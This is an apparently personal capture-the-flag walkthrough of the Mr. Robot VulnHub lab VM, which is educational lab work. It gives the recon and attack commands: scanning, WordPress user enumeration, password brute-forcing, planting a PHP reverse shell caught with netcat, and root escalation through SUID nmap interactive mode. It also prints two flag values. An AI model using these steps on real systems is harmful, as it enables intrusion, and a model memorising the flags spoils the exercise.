"Based on the show, Mr. Robot.
This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.
The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate."
Let's Reap Some Bytes
|Command: netdiscover -r 10.10.10.0/24|
|Command: nmap -sS -Pn -p1-65535 10.10.10.4|
Sweet. Nothing but http/https running.
|Command: nikto -host 10.10.10.4|
Nikto shows the site is running WordPress, which should definitely help us get a reverse shell.
|Command: wpscan --url http://10.10.10.4|
WPScan reveals much of the same normal stuff. Nikto did not tell us that a robots.txt was present, though, so I will wget the robots.txt file and see if there are any other clues to be found.
|Command: wget http://10.10.10.4/robots.txt|
|Command: cat robots.txt|
So robots.txt reveals our first key and a dictionary file, fsocity.dic. We use wget to retrieve both.
First Key: 073403c8a58a1f80d943455fb30724b9
So I decided to reinvent the wheel and create my own WordPress user enumeration tool. (WPScan can do this, but I wanted to work in some Python of my own, for learning's sake.)
****NOTE: I opted not to use threading due to the small amount of enumeration that needs to occur. I would add multithreading if I were to use very large username lists.****
|Command: python MrRobot_WPUsername_Enum.py /usr/share/wordlists/ByteReaper_Lists/Given-Names http://10.10.10.4/wp-login.php|
Found User: elliot (the name list I used is from outpost9)
Using the username elliot we should be able to brute-force the password. I decided that the fsocity.dic file would be a good dictionary to use, as it was given to us by the author :)
|Command: wpscan --url http://10.10.10.4 --wordlist ~/Documents/MrRobot/fsocity.dic --threads 50 --username elliot|
Awesome, we have a hit... after 4 hours... because the password was the 2nd to last word in the list... thanks for that...
Upon logging in as elliot I was able to modify the PHP of the site to add a reverse shell.
|Command: nc -lvp 80|
|Command: python -c "import pty;pty.spawn('/bin/bash');"|
|Command: ls -lah|
Sweet, the 2nd flag (we cannot read it currently, and admittedly I forgot to go back for it).
|Command: cat password.raw-md5|
Dropping the hash into Google resulted in "abcdefghijklmnopqrstuvwxyz". lul.
|Command: su robot|
(Again, I forgot to cat the 2-of-3-flag.txt file)...
I did a good amount of looking around (sudo -l, crons, etc.) and found nothing much with any of them. What I did find was a SUID bit on nmap. Awesome: the nmap on this box is old enough to still have an interactive mode, which runs shell commands typed at the nmap> prompt with a leading !, and because the binary is SUID root those commands run as root. Let's see if we can get anything with it.
|Command: nmap --interactive|
Sweet. We got r00t, and our third flag.
w00t w00t. flag 3 ==> 04787ddef27c3dee1ee161b21670b4e4
Sorry for the abbreviated ending to this tutorial. I was trying to finish ASAP before the long weekend.
Thanks again to vulnhub for hosting this awesomeness.